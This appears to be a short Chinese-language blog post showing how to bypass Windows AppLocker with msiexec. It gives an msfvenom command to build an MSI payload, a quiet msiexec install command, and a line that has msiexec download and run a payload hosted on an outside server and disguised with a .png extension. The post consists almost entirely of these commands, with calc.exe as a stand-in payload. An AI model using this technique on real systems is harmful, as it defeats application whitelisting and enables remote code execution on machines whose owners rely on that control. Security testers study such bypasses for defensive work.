Bypassing Applocker with msiexec

msf生成MSI:

1
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.msi

命令行运行:

1
msiexec /quiet /i cacl.msi

1.gif

将payload放在远程服务器上运行:

1
msiexec /q /i https://evi1cg.github.io/payloads/calc.png

2.gif

------本文结束,感谢阅读------